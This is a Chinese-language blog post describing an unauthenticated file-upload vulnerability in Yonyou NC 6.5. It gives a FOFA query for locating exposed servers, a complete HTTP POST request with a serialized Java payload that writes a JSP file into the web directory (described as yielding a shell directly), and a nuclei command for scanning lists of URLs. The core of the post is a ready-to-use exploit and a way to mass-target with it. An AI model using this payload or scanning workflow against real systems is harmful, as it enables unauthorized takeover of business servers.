用友NC6.5反序列化文件上传漏洞 nuclei

一、漏洞简介

用友NC产品文件上传的漏洞,恶意攻击者可以通过该漏洞上传任意文件,从而可能导致获取到目标系统管理权限。

根据分析,漏洞为文件上传漏洞,在无需登陆系统的情况下,通过某接口直接上传文件,恶意攻击者成功利用该漏洞可获得目标系统管理权限,系统如果直接暴露在互联网上风险较大,建议及时排查。

二、漏洞影响

用友NC远程代码执行漏洞影响版本:NC6.5之后版本

三、FOFA

app="用友-UFIDA-NC"

四、复现过程

发送请求数据包

POST /servlet/FileReceiveServlet HTTP/1.1
Host: xxx.com:8090
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data;
Referer: https://google.com
Content-Length: 149

¬ísrjava.util.HashMapÚÁÃ`ÑF
loadFactorI	thresholdxp?@wt	FILE_NAMEt	t00ls.jsptTARGET_FILE_PATHt./webapps/nc_webxsasaa

image.png

image.png

可直接getshell

五、nuclei

nuclei  -t  yonyou_NC_servlet_upload_rce.yaml -l url.txt

公众号:北极星sec 回复1010获取

image.png

image.png

参考链接:

https://blog.csdn.net/weixin_44578334/article/details/110917053

posted @ 2022-10-10 10:26  idyork  阅读(3615)  评论(0)    收藏  举报